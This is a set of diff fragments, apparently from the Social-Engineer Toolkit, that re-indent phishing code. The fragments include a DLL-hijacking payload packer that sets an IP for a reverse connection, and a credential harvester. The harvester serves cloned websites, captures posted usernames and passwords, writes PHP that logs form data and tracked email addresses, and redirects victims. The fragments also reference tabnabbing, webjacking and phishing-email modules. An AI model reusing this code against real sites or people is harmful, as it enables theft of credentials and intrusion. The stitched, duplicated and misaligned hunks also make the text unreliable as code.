# replace ipaddress with one that we need for reverse connection back
fileopen=open("src/webattack/dll_hijacking/hijacking.dll" , "rb")
@ -90,7 +90,7 @@ filewrite.close()
print """
Do you want to use a zipfile or rar file. Problem with zip
is they will have to extract the files first, you can't just
open the file from inside the zip. Rar does not have this
open the file from inside the zip. Rar does not have this
restriction and is more reliable
1. Rar File
@ -103,37 +103,37 @@ choice=raw_input(setprompt(["2","15"], "[rar]"))
if choice == "": choice = "1"
# if its not a rar file
if choice != "1":
# if its not a zipfile, you messed up
if choice != "2":
# default to rar file
choice = "1"
# if its not a zipfile, you messed up
if choice != "2":
# default to rar file
choice = "1"
# if its choice 1 do some rar stuff
if choice == "1":
# basic counter
counter=0
# look for rar in default directories
rar_check = subprocess.Popen("rar",shell=True, stdout=subprocess.PIPE)
# comunicate with the process
stdout_value = rar_check.communicate()[0]
# do a search to see if rar is present
match=re.search("Add files to archive", stdout_value)
# we get a hit?
if match:
subprocess.Popen("cd src/program_junk/dll;rar a %s/src/program_junk/template.rar * 1> /dev/null 2> /dev/null" % (definepath), shell=True).wait()
counter=1
# if we didnt find rar
if counter == 0:
print "[!] Error, rar was not detected. Please download rar and place it in your /usr/bin or /usr/local/bin directory."
print "[*] Defaulting to zipfile for the attack vector. Sorry boss."
choice = "2"
# basic counter
counter=0
# look for rar in default directories
rar_check = subprocess.Popen("rar",shell=True, stdout=subprocess.PIPE)
# comunicate with the process
stdout_value = rar_check.communicate()[0]
# do a search to see if rar is present
match=re.search("Add files to archive", stdout_value)
# we get a hit?
if match:
subprocess.Popen("cd src/program_junk/dll;rar a %s/src/program_junk/template.rar * 1> /dev/null 2> /dev/null" % (definepath), shell=True).wait()
counter=1
# if we didnt find rar
if counter == 0:
print "[!] Error, rar was not detected. Please download rar and place it in your /usr/bin or /usr/local/bin directory."
print "[*] Defaulting to zipfile for the attack vector. Sorry boss."
choice = "2"
# if its a zipfile zip the badboy up
if choice == "2":
# write to a zipfile here
file = zipfile.ZipFile("src/program_junk/template.zip", "w")
for name in glob.glob("src/program_junk/dll/*"):
file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED)
file.close()
# write to a zipfile here
file = zipfile.ZipFile("src/program_junk/template.zip", "w")
for name in glob.glob("src/program_junk/dll/*"):
file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED)
file.close()


@ -26,14 +26,14 @@ webattack_email = check_config("WEBATTACK_EMAIL=").lower()
track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
if track_email == "on":
print_status("You have selected to track user accounts, Apache will automatically be turned on to handle tracking of users.")
apache_check = "on"
print_status("You have selected to track user accounts, Apache will automatically be turned on to handle tracking of users.")
apache_check = "on"
# detect openssl module
try:
from OpenSSL import SSL
from OpenSSL import SSL
# handle import error that openssl is not there
except ImportError:
print "Python OpenSSL wasn't detected, note that SSL compatibility is now turned off"
print "Python OpenSSL wasn't detected, note that SSL compatibility is now turned off"
############################################
# Credential harvester #
@ -52,13 +52,13 @@ from src.core.setcore import *
attack_vector=""
fileopen=file("src/program_junk/attack_vector", "r")
for line in fileopen:
line=line.rstrip()
if line == 'multiattack':
attack_vector='multiattack'
line=line.rstrip()
if line == 'multiattack':
attack_vector='multiattack'
# if attack vector isnt the multiattack
if attack_vector != "multiattack":
print bcolors.RED + """
print bcolors.RED + """
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.""" + bcolors.ENDC
# see if we're tabnabbing or multiattack
@ -77,16 +77,16 @@ command_center="off"
fileopen=file("config/set_config" , "r").readlines()
counter=0
for line in fileopen:
line=line.rstrip()
match=re.search("WEB_PORT=", line)
if match:
line=line.replace("WEB_PORT=", "")
web_port=line
counter=1
match2=re.search("COMMAND_CENTER=ON", line)
if match2:
command_center="on"
command_center_write=file("%s/src/program_junk/cc_harvester_hit" % (definepath),"w")
line=line.rstrip()
match=re.search("WEB_PORT=", line)
if match:
line=line.replace("WEB_PORT=", "")
web_port=line
counter=1
match2=re.search("COMMAND_CENTER=ON", line)
if match2:
command_center="on"
command_center_write=file("%s/src/program_junk/cc_harvester_hit" % (definepath),"w")
# if nada default port 80
if counter == 0: web_port=80
@ -95,19 +95,19 @@ if counter == 0: web_port=80
counter=0
fileopen=file("src/program_junk/site.template","r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("URL=",line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
line=line.rstrip()
match=re.search("URL=",line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
# this checks the set_config to see if we need to redirect to a different website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=").lower()
if harvester_redirect == "on":
URL = check_config("HARVESTER_URL=")
counter = 1
URL = check_config("HARVESTER_URL=")
counter = 1
if counter== 0: URL=''
@ -117,53 +117,53 @@ self_signed="false"
# SEE IF WE WANT TO USE SSL
fileopen=file("config/set_config" , "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("WEBATTACK_SSL=ON", line)
if match:
# if we hit on ssl being on, set flag to true
ssl_flag='true'
line=line.rstrip()
match=re.search("WEBATTACK_SSL=ON", line)
if match:
# if we hit on ssl being on, set flag to true
ssl_flag='true'
# if flag is true begin prepping SSL stuff
if ssl_flag=='true':
# set another loop for find other variables we need for SSL setup
for line in fileopen:
# strip line feeds and carriage returns
line=line.rstrip()
# begin search for flags we need
match=re.search("SELF_SIGNED_CERT=ON", line)
# if we hit, lets create our own certificate
if match:
self_signed="true"
# need to import our ssl module for creating a CA
sys.path.append("src/core/ssl")
# import our ssl module
import setssl
subprocess.Popen("cp src/program_junk/CA/*.pem src/program_junk", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# remove old junk we dont need anymore
subprocess.Popen("rm -rf src/program_junk/CA;cp *.pem src/program_junk", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if flag is true begin prepping SSL stuff
if ssl_flag=='true':
# set another loop for find other variables we need for SSL setup
for line in fileopen:
# strip line feeds and carriage returns
line=line.rstrip()
# begin search for flags we need
match=re.search("SELF_SIGNED_CERT=ON", line)
# if we hit, lets create our own certificate
if match:
self_signed="true"
# need to import our ssl module for creating a CA
sys.path.append("src/core/ssl")
# import our ssl module
import setssl
subprocess.Popen("cp src/program_junk/CA/*.pem src/program_junk", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# remove old junk we dont need anymore
subprocess.Popen("rm -rf src/program_junk/CA;cp *.pem src/program_junk", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if user wants to specify his/her own PEM certificate
if self_signed== "false":
for line in fileopen:
line=line.rstrip()
# search for cert path
match=re.search("PEM_CLIENT=", line, flags=re.IGNORECASE)
if match:
pem_client=line.replace("PEM_CLIENT=","")
if not os.path.isfile(pem_client):
print "\nUnable to find PEM file, check location and config again."
exit_set()
if os.path.isfile(pem_client):
subprocess.Popen("cp %s src/program_junk/newcert.pem" % (pem_client), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2=re.search("PEM_SERVER=", line)
if match2:
pem_server=line.replace("PEM_SERVER=","")
if not os.path.isfile(pem_server):
print "\nUnable to find PEM file, check location and config again."
exit_set()
if os.path.isfile(pem_server):
subprocess.Popen("cp %s src/program_junk/newreq.pem" % (pem_server), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if user wants to specify his/her own PEM certificate
if self_signed== "false":
for line in fileopen:
line=line.rstrip()
# search for cert path
match=re.search("PEM_CLIENT=", line, flags=re.IGNORECASE)
if match:
pem_client=line.replace("PEM_CLIENT=","")
if not os.path.isfile(pem_client):
print "\nUnable to find PEM file, check location and config again."
exit_set()
if os.path.isfile(pem_client):
subprocess.Popen("cp %s src/program_junk/newcert.pem" % (pem_client), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2=re.search("PEM_SERVER=", line)
if match2:
pem_server=line.replace("PEM_SERVER=","")
if not os.path.isfile(pem_server):
print "\nUnable to find PEM file, check location and config again."
exit_set()
if os.path.isfile(pem_server):
subprocess.Popen("cp %s src/program_junk/newreq.pem" % (pem_server), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# url decode for postbacks
def htc(m):
return chr(int(m.group(1),16))
@ -181,283 +181,283 @@ bites = file("src/program_junk/bites.file", "a")
# SET Handler for handling POST requests and general setup through SSL
#class SETHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
class SETHandler(BaseHTTPRequestHandler):
def setup(self):
# added a try except block in case of transmission errors
try:
def setup(self):
# added a try except block in case of transmission errors
try:
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
# except errors and pass them
except: pass
# handle basic GET requests
def do_GET(self):
# import proper style css files here
# except errors and pass them
except: pass
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print '-'*40
print 'Exception happened during processing of request from',
print client_address
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print '-'*40
pass
# handle basic GET requests
def do_GET(self):
# import proper style css files here
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print '-'*40
print 'Exception happened during processing of request from',
print client_address
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print '-'*40
pass
counter = 0
counter = 0
# try block setup to catch transmission errors
try:
# try block setup to catch transmission errors
try:
if self.path == "/":
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/index.html" % (definepath), "r")
for line in fileopen:
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
counter = 1
# used for index2
if self.path == "/index2.html":
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/index2.html" % (definepath), "r")
for line in fileopen:
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
counter = 1
else:
if os.path.isfile("%s/src/program_junk/web_clone/%s" % (definepath,self.path)):
self.send_response(200)
# self.send_header('Content-type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/%s" % (definepath,self.path), "rb")
for line in fileopen:
self.wfile.write(line)
# if the file wasn't found
if counter == 0:
if os.path.isfile("%s/src/program_junk/web_clone/%s" % (definepath,self.path)):
fileopen=file("%s/src/program_junk/web_clone%s" % (definepath,self.path), "rb")
for line in fileopen:
self.wfile.write(line)
fileopen.close()
# handle errors, log them and pass through
except Exception, e:
# log to set
log(e)
# pass exceptions to keep going
pass
# handle POST requests
def do_POST(self):
length = int(self.headers.getheader('content-length'))
qs = self.rfile.read(length)
url=urldecode(qs)
# specify we had a bite
bites.write("hit\n")
url=url.split("&")
# change path to root for append on file
os.chdir(homepath)
# put the params into site.template for later user
filewrite=file("src/program_junk/site.template","a")
filewrite.write("\n")
filewrite2 = file("src/logs/harvester.log", "a")
filewrite.write("\n\n")
print bcolors.RED+"[*] WE GOT A HIT! Printing the output:\r" + bcolors.GREEN
for line in url:
counter=0
line=line.rstrip()
# if regular expression hit on user fields then do different
match=re.search("Email|email|login|logon|Logon|Login|user|username|Username",line)
if match:
print bcolors.RED+"POSSIBLE USERNAME FIELD FOUND: "+line+"\r" + bcolors.GREEN
counter=1
match2=re.search("pwd|pass|uid|uname|Uname|userid|userID|USER|USERNAME|PIN|pin|password|Password|secret|Secret|Pass",line)
if match2:
print bcolors.RED+"POSSIBLE PASSWORD FIELD FOUND: "+line+"\r" + bcolors.GREEN
counter=1
filewrite.write(cgi.escape("PARAM: "+line+"\n"))
filewrite2.write(line+"\n")
# if a counter hits at 0 then print this line
if counter==0:
print "PARAM: "+line+"\r"
# reset counter
counter=0
filewrite.write("BREAKHERE")
filewrite.close()
filewrite2.close()
if attack_vector != 'multiattack':
print bcolors.RED+"[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.\r\n\r\n" + bcolors.ENDC
# pull URL field
counter=0
fileopen=file("src/program_junk/site.template","r").readlines()
if self.path == "/":
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/index.html" % (definepath), "r")
for line in fileopen:
line=line.rstrip()
match=re.search("URL=",line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
if counter== 0: URL=''
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
counter = 1
# this checks the set_config to see if we need to redirect to a different website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=").lower()
if harvester_redirect == "on":
RAW_URL = check_config("HARVESTER_URL=")
counter = 1
# used for index2
if self.path == "/index2.html":
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/index2.html" % (definepath), "r")
for line in fileopen:
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
counter = 1
# when done posting send them back to the original site
self.wfile.write('<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
# set it back to our homepage
os.chdir(homepath+"/src/program_junk/web_clone/")
else:
if os.path.isfile("%s/src/program_junk/web_clone/%s" % (definepath,self.path)):
self.send_response(200)
# self.send_header('Content-type', 'text/html')
self.end_headers()
fileopen=file("%s/src/program_junk/web_clone/%s" % (definepath,self.path), "rb")
for line in fileopen:
self.wfile.write(line)
# if the file wasn't found
if counter == 0:
if os.path.isfile("%s/src/program_junk/web_clone/%s" % (definepath,self.path)):
fileopen=file("%s/src/program_junk/web_clone%s" % (definepath,self.path), "rb")
for line in fileopen:
self.wfile.write(line)
fileopen.close()
# handle errors, log them and pass through
except Exception, e:
# log to set
log(e)
# pass exceptions to keep going
pass
# handle POST requests
def do_POST(self):
length = int(self.headers.getheader('content-length'))
qs = self.rfile.read(length)
url=urldecode(qs)
# specify we had a bite
bites.write("hit\n")
url=url.split("&")
# change path to root for append on file
os.chdir(homepath)
# put the params into site.template for later user
filewrite=file("src/program_junk/site.template","a")
filewrite.write("\n")
filewrite2 = file("src/logs/harvester.log", "a")
filewrite.write("\n\n")
print bcolors.RED+"[*] WE GOT A HIT! Printing the output:\r" + bcolors.GREEN
for line in url:
counter=0
line=line.rstrip()
# if regular expression hit on user fields then do different
match=re.search("Email|email|login|logon|Logon|Login|user|username|Username",line)
if match:
print bcolors.RED+"POSSIBLE USERNAME FIELD FOUND: "+line+"\r" + bcolors.GREEN
counter=1
match2=re.search("pwd|pass|uid|uname|Uname|userid|userID|USER|USERNAME|PIN|pin|password|Password|secret|Secret|Pass",line)
if match2:
print bcolors.RED+"POSSIBLE PASSWORD FIELD FOUND: "+line+"\r" + bcolors.GREEN
counter=1
filewrite.write(cgi.escape("PARAM: "+line+"\n"))
filewrite2.write(line+"\n")
# if a counter hits at 0 then print this line
if counter==0:
print "PARAM: "+line+"\r"
# reset counter
counter=0
filewrite.write("BREAKHERE")
filewrite.close()
filewrite2.close()
if attack_vector != 'multiattack':
print bcolors.RED+"[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.\r\n\r\n" + bcolors.ENDC
# pull URL field
counter=0
fileopen=file("src/program_junk/site.template","r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("URL=",line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
if counter== 0: URL=''
# this checks the set_config to see if we need to redirect to a different website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=").lower()
if harvester_redirect == "on":
RAW_URL = check_config("HARVESTER_URL=")
counter = 1
# when done posting send them back to the original site
self.wfile.write('<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
# set it back to our homepage
os.chdir(homepath+"/src/program_junk/web_clone/")
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def run():
# check if we are running apache mode
if apache_check == "off":
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server.serve_forever()
# check if we are running apache mode
if apache_check == "off":
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
os.chdir(homepath)
try:
visits.close()
bites.close()
# handle keyboard interrupts
except KeyboardInterrupt:
os.chdir(homepath)
try:
visits.close()
bites.close()
except: pass
if attack_vector != 'multiattack':
sys.path.append("src/harvester")
import report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
httpd.socket.close()
except: pass
if attack_vector != 'multiattack':
sys.path.append("src/harvester")
import report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
httpd.socket.close()
# handle the rest
except Exception, e:
log(e)
print bcolors.RED + "[*] Looks like the web_server can't bind to 80. Are you running Apache?" + bcolors.ENDC
apache_stop = raw_input("Do you want to attempt to disable Apache? [y/n]: ")
apache_counter = 0
if apache_stop == "yes" or apache_stop == "y" or apache_stop == "":
if os.path.isfile("/etc/init.d/apache2"):
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/httpd"):
subprocess.Popen("/etc/init.d/httpd stop", shell=True).wait()
apache_counter = 1
if apache_counter == 1:
# check if we are running apache mode
print_status("Successfully stopped Apache. Starting the credential harvester.")
print_status("Harvester is ready, have victim browse to your site.")
if apache_check == "off":
try:
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server.serve_forever()
# handle the rest
except Exception, e:
log(e)
print bcolors.RED + "[*] Looks like the web_server can't bind to 80. Are you running Apache?" + bcolors.ENDC
apache_stop = raw_input("Do you want to attempt to disable Apache? [y/n]: ")
apache_counter = 0
if apache_stop == "yes" or apache_stop == "y" or apache_stop == "":
if os.path.isfile("/etc/init.d/apache2"):
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/httpd"):
subprocess.Popen("/etc/init.d/httpd stop", shell=True).wait()
apache_counter = 1
if apache_counter == 1:
# check if we are running apache mode
print_status("Successfully stopped Apache. Starting the credential harvester.")
print_status("Harvester is ready, have victim browse to your site.")
if apache_check == "off":
try:
# handle keyboard interrupts
except KeyboardInterrupt:
os.chdir(homepath)
try:
visits.close()
bites.close()
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server.serve_forever()
except: pass
if attack_vector != 'multiattack':
sys.path.append("src/harvester")
import report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
httpd.socket.close()
except Exception:
apache_counter = 0
# handle keyboard interrupts
except KeyboardInterrupt:
os.chdir(homepath)
try:
visits.close()
bites.close()
if apache_counter == 0:
print bcolors.GREEN + "[*] Try disabling Apache and try SET again." + bcolors.ENDC
print "[*] Printing error: "+ str(e) + "\n"
return_continue()
exit_set()
except: pass
if attack_vector != 'multiattack':
sys.path.append("src/harvester")
import report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
httpd.socket.close()
except Exception:
apache_counter = 0
# if we are using apache, then use the harvester php type that writes it out to post.php
# note just change the index.html to post somewhere else and rename the post.php to something else
if apache_check == "on":
if apache_counter == 0:
print bcolors.GREEN + "[*] Try disabling Apache and try SET again." + bcolors.ENDC
print "[*] Printing error: "+ str(e) + "\n"
return_continue()
exit_set()
try:
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', int(web_port)))
ipaddr.settimeout(2)
if ipaddr: pass
# if we are using apache, then use the harvester php type that writes it out to post.php
# note just change the index.html to post somewhere else and rename the post.php to something else
if apache_check == "on":
except Exception, e:
if os.path.isfile("/etc/init.d/apache2"):
apache_start = raw_input("[!] Apache may be not running, do you want SET to start the process? [y/n]: ")
if apache_start == "y":
subprocess.Popen("/etc/init.d/apache2 start", shell=True).wait()
try:
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', int(web_port)))
ipaddr.settimeout(2)
if ipaddr: pass
except Exception, e:
if os.path.isfile("/etc/init.d/apache2"):
apache_start = raw_input("[!] Apache may be not running, do you want SET to start the process? [y/n]: ")
if apache_start == "y":
subprocess.Popen("/etc/init.d/apache2 start", shell=True).wait()
apache_dir = check_config("APACHE_DIRECTORY=")
print bcolors.GREEN + "Apache webserver is set to ON. Copying over PHP file to the website."
print "Please note that all output from the harvester will be found under apache_dir/harvester_date.txt"
print "Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC
filewrite = file("%s/post.php" % (apache_dir), "w")
now=datetime.datetime.today()
filewrite.write("""<?php $file = 'harvester_%s.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?>""" % (now))
filewrite.close()
filewrite = file("%s/harvester_%s.txt" % (apache_dir,now), "w")
filewrite.write("")
filewrite.close()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" % (apache_dir,now), shell=True).wait()
# here we specify if we are tracking users and such
if track_email.lower() == "on":
fileopen = file ("%s/src/program_junk/web_clone/index.html" % (definepath), "r")
data = fileopen.read()
data = data.replace("<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = file("%s/src/program_junk/web_clone/index.2" % (definepath), "w")
filewrite.write(data)
filewrite.close()
os.remove("%s/src/program_junk/web_clone/index.html" % (definepath))
shutil.copyfile("%s/src/program_junk/web_clone/index.2" % (definepath), "%s/src/program_junk/web_clone/index.html" % (definepath))
apache_dir = check_config("APACHE_DIRECTORY=")
print bcolors.GREEN + "Apache webserver is set to ON. Copying over PHP file to the website."
print "Please note that all output from the harvester will be found under apache_dir/harvester_date.txt"
print "Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC
filewrite = file("%s/post.php" % (apache_dir), "w")
now=datetime.datetime.today()
filewrite.write("""<?php $file = 'harvester_%s.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?>""" % (now))
filewrite.close()
filewrite = file("%s/harvester_%s.txt" % (apache_dir,now), "w")
filewrite.write("")
filewrite.close()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" % (apache_dir,now), shell=True).wait()
# here we specify if we are tracking users and such
if track_email.lower() == "on":
fileopen = file ("%s/src/program_junk/web_clone/index.html" % (definepath), "r")
data = fileopen.read()
data = data.replace("<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = file("%s/src/program_junk/web_clone/index.2" % (definepath), "w")
filewrite.write(data)
filewrite.close()
os.remove("%s/src/program_junk/web_clone/index.html" % (definepath))
shutil.copyfile("%s/src/program_junk/web_clone/index.2" % (definepath), "%s/src/program_junk/web_clone/index.html" % (definepath))
if os.path.isfile("%s/index.html" % (apache_dir)):
os.remove("%s/index.html" % (apache_dir))
if track_email.lower() == "off":
shutil.copyfile("%s/src/program_junk/web_clone/index.html" % (definepath), "%s/index.html" % (apache_dir))
if track_email.lower() == "on":
shutil.copyfile("%s/src/program_junk/web_clone/index.html" % (definepath), "%s/index.php" % (apache_dir))
print_status("NOTE: The URL to click on is index.php NOT index.html with track emails.")
print_status("All files have been copied to %s" % (apache_dir))
if os.path.isfile("%s/index.html" % (apache_dir)):
os.remove("%s/index.html" % (apache_dir))
if track_email.lower() == "off":
shutil.copyfile("%s/src/program_junk/web_clone/index.html" % (definepath), "%s/index.html" % (apache_dir))
if track_email.lower() == "on":
shutil.copyfile("%s/src/program_junk/web_clone/index.html" % (definepath), "%s/index.php" % (apache_dir))
print_status("NOTE: The URL to click on is index.php NOT index.html with track emails.")
print_status("All files have been copied to %s" % (apache_dir))
if attack_vector != 'multiattack':
pause = raw_input("{Press return to continue}")
if attack_vector != 'multiattack':
pause = raw_input("{Press return to continue}")
class SecureHTTPServer(HTTPServer):
def __init__(self, server_address, HandlerClass):
@ -480,56 +480,55 @@ class SecureHTTPServer(HTTPServer):
def ssl_server(HandlerClass = SETHandler,ServerClass = SecureHTTPServer):
# bind to all interfaces on 443
server_address = ('', 443) # (address, port)
# setup the httpd server
httpd = ServerClass(server_address, HandlerClass)
# serve the httpd server until exit
httpd.serve_forever()
server_address = ('', 443) # (address, port)
# setup the httpd server
httpd = ServerClass(server_address, HandlerClass)
# serve the httpd server until exit
httpd.serve_forever()
if track_email == "on": webattack_email = "on"
# if emailer webattack, spawn email questions
if webattack_email == "on":
try:
import src.phishing.smtp.client.smtp_web
except Exception, e:
reload(src.phishing.smtp.client.smtp_web)
if webattack_email == "on":
try:
import src.phishing.smtp.client.smtp_web
except Exception, e:
reload(src.phishing.smtp.client.smtp_web)
# see if we're tabnabbing or multiattack
fileopen=file("src/program_junk/attack_vector", "r")
for line in fileopen:
line=line.rstrip()
if line == 'tabnabbing':
print bcolors.RED+ "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs."
if line == 'webjacking':
print bcolors.RED+ "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link."
line=line.rstrip()
if line == 'tabnabbing':
print bcolors.RED+ "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs."
if line == 'webjacking':
print bcolors.RED+ "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link."
if ssl_flag == 'true':
web_port="443"
# check for PEM files here
if not os.path.isfile("src/program_junk/newreq.pem"):
print "PEM files not detected. SSL will not work properly."
if not os.path.isfile("src/program_junk/newcert.pem"):
print "PEM files not detected. SSL will not work properly."
# copy over our PEM files
#if self_signed =="true":
subprocess.Popen("cp src/program_junk/*.pem src/program_junk/web_clone/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
web_port="443"
# check for PEM files here
if not os.path.isfile("src/program_junk/newreq.pem"):
print "PEM files not detected. SSL will not work properly."
if not os.path.isfile("src/program_junk/newcert.pem"):
print "PEM files not detected. SSL will not work properly."
# copy over our PEM files
#if self_signed =="true":
subprocess.Popen("cp src/program_junk/*.pem src/program_junk/web_clone/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# head over to cloned dir
os.chdir("src/program_junk/web_clone/")
if attack_vector != "multiattack":
print bcolors.BLUE+"[*] Social-Engineer Toolkit Credential Harvester Attack\r\n[*] Credential Harvester is running on port "+web_port+"\r"
print "[*] Information will be displayed to you as it arrives below:\r" + bcolors.ENDC
print bcolors.BLUE+"[*] Social-Engineer Toolkit Credential Harvester Attack\r\n[*] Credential Harvester is running on port "+web_port+"\r"
print "[*] Information will be displayed to you as it arrives below:\r" + bcolors.ENDC
# catch all
try:
# if we are using ssl
if ssl_flag == 'true':
ssl_server()
# if we are using ssl
if ssl_flag == 'true':
ssl_server()
# if we aren't using ssl
if ssl_flag == 'false':
run()
# if we aren't using ssl
if ssl_flag == 'false':
run()
except:
pass
pass


@ -30,85 +30,85 @@ fileopen=file("%s/src/program_junk/site.template" % (definepath), "r")
site_template = file("%s/src/program_junk/site.template" % (definepath), "r").readlines()
fileopen1=file("%s/src/core/reports/index.html" % (definepath), "r")
for line in fileopen:
match=re.search("URL=", line)
if match:
url=line.replace("URL=http://", "")
url=line.replace("URL=https://", "")
filewrite2=file("reports/%s.xml" % (now), "a")
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
filewrite2.write(r"<harvester>" + "\n")
for line2 in fileopen1:
counter=0
filewrite=file("reports/%s.html" % (now), "a")
match1=re.search("REPLACEHEREDUDE", line2)
if match1:
line2=line2.replace("REPLACEHEREDUDE", url)
filewrite.write(line2)
url_xml=url.rstrip()
filewrite2.write(" %s" % (url_xml) + "\n")
counter=1
match2=re.search("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", line2)
if match2:
line2=line2.replace("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", "Report findings on %s<br><br>" % (url))
counter=1
filewrite.write(line2)
opentag = True
for line3 in site_template:
match3=re.search("PARAM:", line3)
if match3:
xml=line3.replace("PARAM: ", "")
xml=xml.rstrip()
filewrite.write(line3+"<br>")
if opentag:
filewrite2.write(r" <url>")
opentag = False
filewrite2.write(r" <param>%s</param>" % (xml) + "\n")
match4=re.search("BREAKHERE", line3)
if match4:
filewrite2.write(" </url>" + "\n")
opentag = True
filewrite.write("<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>")
match=re.search("URL=", line)
if match:
url=line.replace("URL=http://", "")
url=line.replace("URL=https://", "")
filewrite2=file("reports/%s.xml" % (now), "a")
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
filewrite2.write(r"<harvester>" + "\n")
for line2 in fileopen1:
counter=0
filewrite=file("reports/%s.html" % (now), "a")
match1=re.search("REPLACEHEREDUDE", line2)
if match1:
line2=line2.replace("REPLACEHEREDUDE", url)
filewrite.write(line2)
url_xml=url.rstrip()
filewrite2.write(" %s" % (url_xml) + "\n")
counter=1
match2=re.search("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", line2)
if match2:
